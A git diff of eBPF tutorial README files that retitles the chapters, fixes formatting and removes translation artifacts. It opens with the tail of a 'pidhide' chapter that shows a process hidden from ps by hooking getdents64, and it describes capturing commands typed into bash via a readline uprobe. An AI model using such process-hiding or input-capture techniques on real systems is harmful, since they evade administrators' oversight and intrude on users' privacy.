+Hid PID from program 31609 (bash)
+Hid PID from program 31640 (ps)
+Hid PID from program 31649 (ps)
+```
+
+Now the process no longer appears in the listing:
+
+```console
+$ ps -aux | grep 1534
+root 31523 0.1 0.0 22004 5616 pts/2 S+ 05:42 0:00 sudo ./pidhide -p 1534
+root 31524 0.0 0.0 22004 812 pts/3 Ss 05:42 0:00 sudo ./pidhide -p 1534
+root 31525 0.3 0.0 3808 2456 pts/3 S+ 05:42 0:00 ./pidhide -p 1534
+yunwei 31583 0.0 0.0 17712 2612 pts/1 S+ 05:42 0:00 grep --color=auto 1534
+```
+
+## Summary
+
+This article showed how an eBPF program can hide a process by hooking the `getdents64` system call and patching, in user memory, the directory entries it returns. You can also visit our tutorial code repository [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or our website [https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/) for more examples and the full tutorial.
diff --git a/src/3-fentry-unlink/README_en.md b/src/3-fentry-unlink/README_en.md
index 6e20f2e..7b3bd10 100644
--- a/src/3-fentry-unlink/README_en.md
+++ b/src/3-fentry-unlink/README_en.md
@@ -1,8 +1,8 @@
-# eBPF Introductory Development Practice Tutorial 3: Detecting Captured Unlink System Calls in eBPF
+# eBPF Tutorial by Example 3: Monitoring unlink System Calls with fentry

eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel. It allows developers to dynamically load, update, and execute user-defined code at runtime in the kernel.

-This article is the third part of the eBPF introductory development practice tutorial, focusing on capturing unlink system calls using fentry in eBPF.
+This article is the third part of the eBPF Tutorial by Example, focusing on capturing unlink system calls using fentry in eBPF.

## Fentry

@@ -83,6 +83,6 @@ $ sudo cat /sys/kernel/debug/tracing/trace_pipe

This program is an eBPF program that captures the `do_unlinkat` and `do_unlinkat_exit` functions using fentry and fexit, and uses the `bpf_get_current_pid_tgid` and `bpf_printk` functions to obtain the PID, filename, and return value of the process calling do_unlinkat, and print them in the kernel log.

-To compile this program, you can use the ecc tool, and to run it, you can use the ecli command, and view the output of the eBPF program by checking the `/sys/kernel/debug/tracing/trace_pipe` file. For more examples and detailed development guide, please refer to the official documentation of eunomia-bpf: [here](https://github.com/eunomia-bpf/eunomia-bpf)
+To compile this program, you can use the ecc tool; to run it, use the ecli command; and you can view the output of the eBPF program by checking the `/sys/kernel/debug/tracing/trace_pipe` file.
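+For reference, a typical eunomia-bpf workflow looks like the following (the source file name `fentry-link.bpf.c` is an assumption based on this tutorial's directory layout, and the exact commands may vary with your installation):
+
+```console
+$ ecc fentry-link.bpf.c
+$ sudo ecli run ./package.json
+```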
-If you want to learn more about eBPF knowledge and practice, you can visit our tutorial code repository [here](https://github.com/eunomia-bpf/bpf-developer-tutorial) for more examples and complete tutorials.".
+If you'd like to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at https://github.com/eunomia-bpf/bpf-developer-tutorial or our website at https://eunomia.dev/tutorials/ for more examples and complete tutorials.
diff --git a/src/4-opensnoop/README_en.md b/src/4-opensnoop/README_en.md
index 86a1154..9c29128 100644
--- a/src/4-opensnoop/README_en.md
+++ b/src/4-opensnoop/README_en.md
@@ -1,8 +1,8 @@
-# eBPF Getting Started Development Tutorial 4: Capturing the System Call Collection of Process Opening Files in eBPF and Using Global Variables to Filter Process PIDs
+# eBPF Tutorial by Example 4: Capturing Process Opening Files and Filtering with Global Variables

eBPF (Extended Berkeley Packet Filter) is a kernel execution environment that allows users to run secure and efficient programs in the kernel. It is commonly used for network filtering, performance analysis, security monitoring, and other scenarios. The power of eBPF lies in its ability to capture and modify network packets or system calls at runtime in the kernel, enabling monitoring and adjustment of the operating system's behavior.

-This article is the fourth part of the eBPF Getting Started Development Tutorial, mainly focusing on how to capture the system call collection of process opening files and filtering process PIDs using global variables in eBPF.
+This article is the fourth part of the eBPF Tutorial by Example, mainly focusing on how to capture the system calls that a process uses to open files and how to filter by process PID using global variables in eBPF.

In a Linux system, the interaction between processes and files is achieved through system calls. System calls serve as the interface between user-space programs and kernel-space programs, allowing user programs to request specific operations from the kernel. In this tutorial, we focus on the sys_openat system call, which is used to open files.

@@ -119,6 +119,4 @@ This article introduces how to use eBPF programs to capture the system calls for opening files.

By learning this tutorial, you should have a deeper understanding of how to capture and filter system calls for specific processes in eBPF. This method has widespread applications in system monitoring, performance analysis, and security auditing.

-For more examples and detailed development guides, please refer to the official documentation of eunomia-bpf:
-
If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at https://github.com/eunomia-bpf/bpf-developer-tutorial or our website at https://eunomia.dev/tutorials/ for more examples and a complete tutorial.
diff --git a/src/5-uprobe-bashreadline/README_en.md b/src/5-uprobe-bashreadline/README_en.md
index e5a72cc..fa51296 100644
--- a/src/5-uprobe-bashreadline/README_en.md
+++ b/src/5-uprobe-bashreadline/README_en.md
@@ -1,8 +1,8 @@
-# eBPF Beginner's Development Tutorial 5: Capturing readline Function Calls in eBPF
+# eBPF Tutorial by Example 5: Capturing readline Function Calls with uprobe

eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel that allows developers to dynamically load, update, and run user-defined code at runtime.

-This article is the fifth part of the eBPF beginner's development tutorial, which mainly introduces how to capture readline function calls in bash using uprobe.
+This article is the fifth part of the eBPF Tutorial by Example, which mainly introduces how to capture readline function calls in bash using uprobe.

## What is uprobe

@@ -119,6 +119,4 @@ You can see that we have successfully captured the `readline` function call of `bash`.

In the above code, we used the `SEC` macro to define an uprobe probe, which specifies the user-space program to be traced (`/bin/bash`) and the function to be traced (`readline`). In addition, we used the `BPF_KRETPROBE` macro to define a callback function (`printret`) for handling the return value of the `readline` function. This function can retrieve the return value of the `readline` function and print it to the kernel log. In this way, we can use eBPF to capture the `readline` function call of `bash` and obtain the command line entered by the user in `bash`.

-For more examples and detailed development guides, please refer to the official documentation of eunomia-bpf:
-
-If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository or website to get more examples and complete tutorials. \ No newline at end of file
+If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at https://github.com/eunomia-bpf/bpf-developer-tutorial or our website at https://eunomia.dev/tutorials/ to get more examples and complete tutorials.
diff --git a/src/6-sigsnoop/README.md b/src/6-sigsnoop/README.md
index b48b434..2a8715b 100755
--- a/src/6-sigsnoop/README.md
+++ b/src/6-sigsnoop/README.md
@@ -60,9 +60,9 @@ static int probe_exit(void *ctx, int ret)
 eventp->ret = ret;
 bpf_printk("PID %d (%s) sent signal %d ",
-           eventp->pid, eventp->comm, eventp->sig);
+        eventp->pid, eventp->comm, eventp->sig);
 bpf_printk("to PID %d, ret = %d",
-           eventp->tpid, ret);
+        eventp->tpid, ret);

cleanup:
 bpf_map_delete_elem(&values, &tid);

@@ -116,10 +116,10 @@ Running eBPF program...

```console
$ sudo cat /sys/kernel/debug/tracing/trace_pipe
- systemd-journal-363 [000] d...1 672.563868: bpf_trace_printk: PID 363 (systemd-journal) sent signal 0
- systemd-journal-363 [000] d...1 672.563869: bpf_trace_printk: to PID 1400, ret = 0
- systemd-journal-363 [000] d...1 672.563870: bpf_trace_printk: PID 363 (systemd-journal) sent signal 0
- systemd-journal-363 [000] d...1 672.563870: bpf_trace_printk: to PID 1527, ret = -3
+ systemd-journal-363 [000] d...1 672.563868: bpf_trace_printk: PID 363 (systemd-journal) sent signal 0
+ systemd-journal-363 [000] d...1 672.563869: bpf_trace_printk: to PID 1400, ret = 0
+ systemd-journal-363 [000] d...1 672.563870: bpf_trace_printk: PID 363 (systemd-journal) sent signal 0
+ systemd-journal-363 [000] d...1 672.563870: bpf_trace_printk: to PID 1527, ret = -3
```

## 总结
diff --git a/src/6-sigsnoop/README_en.md b/src/6-sigsnoop/README_en.md
index 139d382..a319068 100755
--- a/src/6-sigsnoop/README_en.md
+++ b/src/6-sigsnoop/README_en.md
@@ -1,8 +1,8 @@
-# eBPF Beginner's Development Practice Tutorial 6: Capturing a Collection of System Calls that Send Signals to Processes, Using a Hash Map to Store State
+# eBPF Tutorial by Example 6: Capturing Process Signal Sending and Using a Hash Map to Store State

eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel that allows developers to dynamically load, update, and run user-defined code at runtime.
-This article is the sixth part of the eBPF beginner's development practice tutorial, which mainly introduces how to implement an eBPF tool that captures a collection of system calls that send signals to processes and uses a hash map to store state.
+This article is the sixth part of the eBPF Tutorial by Example. It mainly introduces how to implement an eBPF tool that captures the system calls that send signals to processes, using a hash map to store state.

## sigsnoop

@@ -60,9 +60,9 @@ static int probe_exit(void *ctx, int ret)
 eventp->ret = ret;
 bpf_printk("PID %d (%s) sent signal %d ",
-           eventp->pid, eventp->comm, eventp->sig);
+        eventp->pid, eventp->comm, eventp->sig);
 bpf_printk("to PID %d, ret = %d",
-           eventp->tpid, ret);
+        eventp->tpid, ret);

cleanup:
 bpf_map_delete_elem(&values, &tid);

@@ -115,10 +115,10 @@ After running this program, you can view the output of the eBPF program by checking the `/sys/kernel/debug/tracing/trace_pipe` file.

```console
$ sudo cat /sys/kernel/debug/tracing/trace_pipe
- systemd-journal-363 [000] d...1 672.563868: bpf_trace_printk: PID 363 (systemd-journal) sent signal 0
- systemd-journal-363 [000] d...1 672.563869: bpf_trace_printk: to PID 1400, ret = 0
- systemd-journal-363 [000] d...1 672.563870: bpf_trace_printk: PID 363 (systemd-journal) sent signal 0
- systemd-journal-363 [000] d...1 672.563870: bpf_trace_printk: to PID 1527, ret = -3
+ systemd-journal-363 [000] d...1 672.563868: bpf_trace_printk: PID 363 (systemd-journal) sent signal 0
+ systemd-journal-363 [000] d...1 672.563869: bpf_trace_printk: to PID 1400, ret = 0
+ systemd-journal-363 [000] d...1 672.563870: bpf_trace_printk: PID 363 (systemd-journal) sent signal 0
+ systemd-journal-363 [000] d...1 672.563870: bpf_trace_printk: to PID 1527, ret = -3
```

## Summary

@@ -136,6 +136,4 @@ struct {

And using the corresponding APIs for access, such as `bpf_map_lookup_elem`, `bpf_map_update_elem`, `bpf_map_delete_elem`, etc.

-For more examples and detailed development guides, please refer to the official documentation of eunomia-bpf:
-
-If you want to learn more about eBPF knowledge and practice, you can visit our tutorial code repository or website to get more examples and complete tutorials." \ No newline at end of file
+If you want to learn more about eBPF knowledge and practice, you can visit our tutorial code repository at https://github.com/eunomia-bpf/bpf-developer-tutorial or our website at https://eunomia.dev/tutorials/ to get more examples and complete tutorials.
diff --git a/src/7-execsnoop/README_en.md b/src/7-execsnoop/README_en.md
index 55c727e..3cf53d5 100644
--- a/src/7-execsnoop/README_en.md
+++ b/src/7-execsnoop/README_en.md
@@ -1,8 +1,8 @@
-# eBPF Beginner's Practical Tutorial Seven: Capturing Process Execution Event, Printing Output to User Space via perf event array
+# eBPF Tutorial by Example 7: Capturing Process Execution Event, Printing Output with perf event array

eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel that allows developers to dynamically load, update, and run user-defined code at runtime.

-This article is the seventh part of the eBPF beginner's development tutorial and mainly introduces how to capture process execution events in the Linux kernel and print output to the user command line via a perf event array. This eliminates the need to view the output of eBPF programs by checking the `/sys/kernel/debug/tracing/trace_pipe` file. After sending information to user space via the perf event array, complex data processing and analysis can be performed.
+This article is the seventh part of the eBPF Tutorial by Example and mainly introduces how to capture process execution events in the Linux kernel and print output to the user command line via a perf event array. This eliminates the need to view the output of eBPF programs by checking the `/sys/kernel/debug/tracing/trace_pipe` file. After sending information to user space via the perf event array, complex data processing and analysis can be performed.

## perf buffer

@@ -78,7 +78,7 @@ In the entry program, we first obtain the process ID and user ID of the current process.

With this code, we can capture process execution events in the Linux kernel and analyze the process execution behavior.

-"eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain that combines with Wasm. Its goal is to simplify the development, building, distribution, and execution of eBPF programs. You can refer to the following link to download and install the ecc compilation toolchain and ecli runtime: [https://github.com/eunomia-bpf/eunomia-bpf](https://github.com/eunomia-bpf/eunomia-bpf). We use eunomia-bpf to compile and execute this example.
+We use eunomia-bpf to compile and execute this example. You can refer to the following link to download and install the ecc compilation toolchain and ecli runtime: [https://github.com/eunomia-bpf/eunomia-bpf](https://github.com/eunomia-bpf/eunomia-bpf).

Compile using a container:

diff --git a/src/8-exitsnoop/README_en.md b/src/8-exitsnoop/README_en.md
index 9448fd3..a6567f4 100644
--- a/src/8-exitsnoop/README_en.md
+++ b/src/8-exitsnoop/README_en.md
@@ -1,8 +1,8 @@
-# eBPF Introductory Development Tutorial 8: Monitoring Process Exit Events with eBPF, Using Ring Buffer to Print Output to User Space
+# eBPF Tutorial by Example 8: Monitoring Process Exit Events, Print Output with Ring Buffer

eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel. It allows developers to dynamically load, update, and run user-defined code at runtime in the kernel.

-This article is the eighth part of the eBPF Introductory Development Tutorial, focusing on monitoring process exit events with eBPF.
+This article is the eighth part of the eBPF Tutorial by Example, focusing on monitoring process exit events with eBPF.

## Ring Buffer

@@ -28,7 +28,7 @@ At the same time, the BPF ring buffer solves the following problems of the BPF perf buffer.

## exitsnoop

-This article is the eighth part of the eBPF Introductory Development Tutorial, focusing on monitoring process exit events with eBPF and using the ring buffer to print output to user space.
+This article is the eighth part of the eBPF Tutorial by Example, focusing on monitoring process exit events with eBPF and using the ring buffer to print output to user space.

The steps for printing output to user space using the ring buffer are similar to those for the perf buffer; a minimal sketch of the pattern follows.
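As a quick reminder of what that pattern looks like end to end, here is a minimal, self-contained sketch; the names (`rb`, `struct event`, `handle_exit`) are illustrative and not taken from the exitsnoop sources. On the kernel side, we declare a ring buffer map, reserve space in it, fill in an event, and submit it:

```c
// Kernel side (sketch): a ring buffer map plus a tracepoint program.
// Assumes the usual #include "vmlinux.h" and <bpf/bpf_helpers.h>.
struct event {
    int pid;
    char comm[16];
};

struct {
    __uint(type, BPF_MAP_TYPE_RINGBUF);
    __uint(max_entries, 256 * 1024);
} rb SEC(".maps");

SEC("tp/sched/sched_process_exit")
int handle_exit(void *ctx)
{
    struct event *e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0);
    if (!e)
        return 0; // buffer full; drop the event
    e->pid = bpf_get_current_pid_tgid() >> 32;
    bpf_get_current_comm(&e->comm, sizeof(e->comm));
    bpf_ringbuf_submit(e, 0);
    return 0;
}
```

On the user-space side, the program opens the ring buffer with a callback and polls it:

```c
// User side (sketch): poll the ring buffer and dispatch events to a callback.
struct ring_buffer *rb = ring_buffer__new(bpf_map__fd(skel->maps.rb),
                                          handle_event, NULL, NULL);
while (!exiting)
    ring_buffer__poll(rb, 100 /* timeout, ms */);
```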
First, a header file needs to be defined:

@@ -153,6 +153,7 @@
 21:40:09 42057 42054 0 0 cat
 21:40:09 42058 42054 0 0 cat
 21:40:09 42059 42054 0 0 cat
+```

## Summary

diff --git a/src/9-runqlat/README.md b/src/9-runqlat/README.md
index 051c080..812b1f7 100755
--- a/src/9-runqlat/README.md
+++ b/src/9-runqlat/README.md
@@ -446,6 +446,4 @@ runqlat 是一个 Linux 内核 BPF 程序,通过柱状图来总结调度程序

runqlat 是一种用于监控Linux内核中进程调度延迟的工具。它可以帮助您了解进程在内核中等待执行的时间,并根据这些信息优化进程调度,提高系统的性能。可以在 libbpf-tools 中找到最初的源代码:

-更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档:
-
 如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。
diff --git a/src/9-runqlat/README_en.md b/src/9-runqlat/README_en.md
index 2b4586f..efe779e 100755
--- a/src/9-runqlat/README_en.md
+++ b/src/9-runqlat/README_en.md
@@ -1,4 +1,4 @@
-# eBPF Beginner's Development Tutorial 9: Capturing Process Scheduling Latency and Recording as Histogram
+# eBPF Tutorial by Example 9: Capturing Process Scheduling Latency and Recording as Histogram

eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel. It allows developers to dynamically load, update, and run user-defined code at runtime.

@@ -43,8 +43,10 @@ Tracing run queue latency... Hit Ctrl-C to end.
 128 -> 255 : 6 | |
 256 -> 511 : 3 | |
 512 -> 1023 : 5 | |
- 1024 -> 2047 : 27 |* |".
-format: Return only the translated content, not including the original text.## runqlat Code Implementation
+ 1024 -> 2047 : 27 |* |
+```
+
+## runqlat Code Implementation

### runqlat.bpf.c

@@ -98,7 +100,6 @@ struct {

static int trace_enqueue(u32 tgid, u32 pid)
{
-``````cpp
 u64 ts;

 if (!pid)

@@ -182,52 +183,124 @@ return 0;

SEC("raw_tp/sched_wakeup")
int BPF_PROG(handle_sched_wakeup, struct task_struct *p)
{
-if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0))
+    if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0))
 return 0;
-return trace_enqueue(BPF_CORE_READ(p, tgid), BPF_CORE_READ(p, pid));
+    return trace_enqueue(BPF_CORE_READ(p, tgid), BPF_CORE_READ(p, pid));
}

SEC("raw_tp/sched_wakeup_new")
-```# BPF_PROG(handle_sched_wakeup_new, struct task_struct *p) Definition
+int BPF_PROG(handle_sched_wakeup_new, struct task_struct *p)
+{
+    if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0))
+        return 0;

-The code defines a function named `BPF_PROG(handle_sched_wakeup_new, struct task_struct *p)`. It takes a handle and a `task_struct` pointer as parameters. The function checks if a filter condition `filter_cg` is true and whether the current task is under the cgroup using the `bpf_current_task_under_cgroup` function with the `cgroup_map` parameter. If the filter condition is true and the task is not under the cgroup, the function returns 0. Otherwise, it calls the `trace_enqueue` function with the `BPF_CORE_READ(p, tgid)` and `BPF_CORE_READ(p, pid)` values and returns the result.
+    return trace_enqueue(BPF_CORE_READ(p, tgid), BPF_CORE_READ(p, pid));
+}

-## SEC("raw_tp/sched_switch") Definition
+SEC("raw_tp/sched_switch")
+int BPF_PROG(handle_sched_switch, bool preempt, struct task_struct *prev, struct task_struct *next)
+{
+    return handle_switch(preempt, prev, next);
+}

-The code defines another function named `BPF_PROG(handle_sched_switch, bool preempt, struct task_struct *prev, struct task_struct *next)`. It is associated with the `raw_tp/sched_switch` security section. It takes a boolean parameter `preempt` and two `task_struct` pointers named `prev` and `next`.
The function calls the `handle_switch` function with the `preempt`, `prev`, and `next` parameters and returns the result. +char LICENSE[] SEC("license") = "GPL"; +``` -## LICENSE Declaration - -The code declares a character array named `LICENSE` and assigns it the value "GPL". It is associated with the `license` security section. - -## Constants and Global Variables +#### Constants and Global Variables The code defines several constants and volatile global variables used for filtering corresponding tracing targets. These variables include: +```c +#define MAX_ENTRIES 10240 +#define TASK_RUNNING 0 + +const volatile bool filter_cg = false; +const volatile bool targ_per_process = false; +const volatile bool targ_per_thread = false; +const volatile bool targ_per_pidns = false; +const volatile bool targ_ms = false; +const volatile pid_t targ_tgid = 0; +``` + - `MAX_ENTRIES`: The maximum number of map entries. - `TASK_RUNNING`: The task status value. - `filter_cg`, `targ_per_process`, `targ_per_thread`, `targ_per_pidns`, `targ_ms`, `targ_tgid`: Boolean variables for filtering and target options. These options can be set by user-space programs to customize the behavior of the eBPF program. -## eBPF Maps +#### eBPF Maps The code defines several eBPF maps including: + +```c +struct { + __uint(type, BPF_MAP_TYPE_CGROUP_ARRAY); + __type(key, u32); + __type(value, u32); + __uint(max_entries, 1); +} cgroup_map SEC(".maps"); + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, MAX_ENTRIES); + __type(key, u32); + __type(value, u64); +} start SEC(".maps"); + +static struct hist zero; + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, MAX_ENTRIES); + __type(key, u32); + __type(value, struct hist); +} hists SEC(".maps"); +``` + - `cgroup_map`: A cgroup array map used for filtering cgroups. - `start`: A hash map used to store timestamps when processes are enqueued. - `hists`: A hash map used to store histogram data for recording process scheduling delays. -## Helper Functions +#### Helper Functions The code includes two helper functions: + - `trace_enqueue`: This function is used to record the timestamp when a process is enqueued. It takes the `tgid` and `pid` values as parameters. If the `pid` value is 0 or the `targ_tgid` value is not 0 and not equal to `tgid`, the function returns 0. Otherwise, it retrieves the current timestamp using `bpf_ktime_get_ns` and updates the `start` map with the `pid` key and the timestamp value. + +```c +static int trace_enqueue(u32 tgid, u32 pid) +{ + u64 ts; + + if (!pid) + return 0; + if (targ_tgid && targ_tgid != tgid) + return 0; + + ts = bpf_ktime_get_ns(); + bpf_map_update_elem(&start, &pid, &ts, BPF_ANY); + return 0; +} +``` + - `pid_namespace`: This function is used to get the PID namespace of a process. It takes a `task_struct` pointer as a parameter and returns the PID namespace of the process. The function retrieves the PID namespace by following `task_active_pid_ns()` and `pid->numbers[pid->level].ns`. 
-Please note that the translation of function names and variable names may require further context.```
-level = BPF_CORE_READ(pid, level);
-bpf_core_read(&upid, sizeof(upid), &pid->numbers[level]);
-inum = BPF_CORE_READ(upid.ns, ns.inum);
+```c
+static unsigned int pid_namespace(struct task_struct *task)
+{
+    struct pid *pid;
+    unsigned int level;
+    struct upid upid;
+    unsigned int inum;

-return inum;
+    /* get the pid namespace by following task_active_pid_ns(),
+     * pid->numbers[pid->level].ns
+     */
+    pid = BPF_CORE_READ(task, thread_pid);
+    level = BPF_CORE_READ(pid, level);
+    bpf_core_read(&upid, sizeof(upid), &pid->numbers[level]);
+    inum = BPF_CORE_READ(upid.ns, ns.inum);
+
+    return inum;
}
```

@@ -280,10 +353,7 @@ struct hist {

## Compilation and Execution

-`eunomia-bpf` is an open-source eBPF dynamic loading runtime and development toolkit combined with Wasm.
-Its purpose is to simplify the development, build, distribution, and execution of eBPF programs.
-You can refer to to download and install the `ecc` compilation toolkit and `ecli` runtime.
-We will use `eunomia-bpf` to compile and run this example.
+We will use `eunomia-bpf` to compile and run this example. You can refer to [https://github.com/eunomia-bpf/eunomia-bpf](https://github.com/eunomia-bpf/eunomia-bpf) to download and install the `ecc` compilation toolkit and `ecli` runtime.

Compile:

@@ -354,11 +424,11 @@ comm = cpptools
 64 -> 127 : 8 |***************************** |
 128 -> 255 : 3 |********** |

-```
+```

Complete source code can be found at:

-References:
+References:

-
-

@@ -369,6 +439,4 @@ runqlat is a Linux kernel BPF program that summarizes scheduler run queue latency as a histogram.

runqlat is a tool for monitoring process scheduling latency in the Linux kernel. It can help you understand the time processes spend waiting to run in the kernel and optimize process scheduling based on this information to improve system performance. The original source code can be found in libbpf-tools:

-For more examples and detailed development guide, please refer to the official documentation of eunomia-bpf:
-
-If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at or website for more examples and complete tutorials. \ No newline at end of file
+If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at https://github.com/eunomia-bpf/bpf-developer-tutorial or our website at https://eunomia.dev/tutorials/ for more examples and complete tutorials.